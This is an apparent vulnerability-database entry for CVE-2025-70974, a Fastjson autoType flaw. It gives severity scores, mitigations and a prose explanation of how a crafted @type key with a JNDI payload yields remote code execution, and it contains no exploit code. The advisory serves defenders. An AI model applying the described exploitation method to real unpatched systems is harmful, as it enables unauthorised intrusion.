CVE-2025-70974
Published: 09 January 2026
Summary
CVE-2025-70974 is a critical-severity Inclusion of Functionality from Untrusted Control Sphere (CWE-829) vulnerability in 360 (inferred from references). Its CVSS base score is 10.0 (Critical).
Operationally, exploitation aligns with the MITRE ATT&CK technique Exploit Public-Facing Application (T1190); ranked at the 10.0th percentile by exploit likelihood (below the median); it is not currently listed in the CISA KEV catalog.
The strongest mitigations our analysis identified are NIST 800-53 CM-6 (Configuration Settings) and SI-2 (Flaw Remediation).
Threat & Defense at a Glance
Threat & Defense Details
Mitigating Controls (NIST 800-53 r5)AI
Flaw remediation directly addresses CVE-2025-70974 by requiring timely patching of Fastjson to version 1.2.48 or later, eliminating the autoType mishandling that enables JNDI injection.
Configuration settings enforce secure Fastjson parser configurations, such as disabling autoType or implementing whitelisting, preventing exploitation via malicious @type keys in JSON input.
Information input validation detects and blocks malformed JSON payloads containing arbitrary @type class names and embedded JNDI payloads before deserialization by Fastjson.
MITRE ATT&CK Enterprise TechniquesAI
Why these techniques?
Direct remote unauthenticated RCE via malicious JSON input to public-facing apps using vulnerable Fastjson autoType/JNDI handling.
NVD Description
Fastjson before 1.2.48 mishandles autoType because, when an @type key is in a JSON document, and the value of that key is the name of a Java class, there may be calls to certain public methods of that class. Depending…
more
on the behavior of those methods, there may be JNDI injection with an attacker-supplied payload located elsewhere in that JSON document. This was exploited in the wild in 2023 through 2025. NOTE: this issue exists because of an incomplete fix for CVE-2017-18349. Also, a later bypass is covered by CVE-2022-25845.
Deeper analysisAI
CVE-2025-70974 is a critical vulnerability in the Fastjson Java library versions prior to 1.2.48, stemming from improper handling of the autoType feature. Specifically, when a JSON document contains an @type key whose value specifies the name of a Java class, Fastjson may invoke certain public methods on that class. Depending on those methods' behavior, this can enable JNDI injection using an attacker-supplied payload embedded elsewhere in the same JSON document. The flaw represents an incomplete fix for CVE-2017-18349, with a related bypass addressed in CVE-2022-25845. It carries a CVSS v3.1 base score of 10.0 (AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H) and is associated with CWE-829 (Inclusion of Functionality from Untrusted Control Sphere).
The vulnerability can be exploited by unauthenticated remote attackers who supply malicious JSON input to applications parsing it with vulnerable Fastjson versions. By crafting a JSON payload with an @type field pointing to a controllable Java class and embedding a JNDI payload, attackers can trigger remote code execution (RCE) through JNDI lookups, potentially leading to full system compromise with high impacts on confidentiality, integrity, and availability across the affected scope.
Advisories and patch notes recommend upgrading to Fastjson 1.2.48 or later, as evidenced by the official changelog comparing versions 1.2.47 and 1.2.48 on GitHub. Additional resources, including exploitation proofs on Vulhub and Chinese advisories like CNVD-2019-22238, highlight disabling autoType or using whitelisting as interim measures where upgrading is not feasible.
This issue saw real-world exploitation from 2023 through 2025, including campaigns by actors like Androxgh0st, who compromised a US university to host C2 infrastructure, per CloudSEK analysis.
Details
- CWE(s)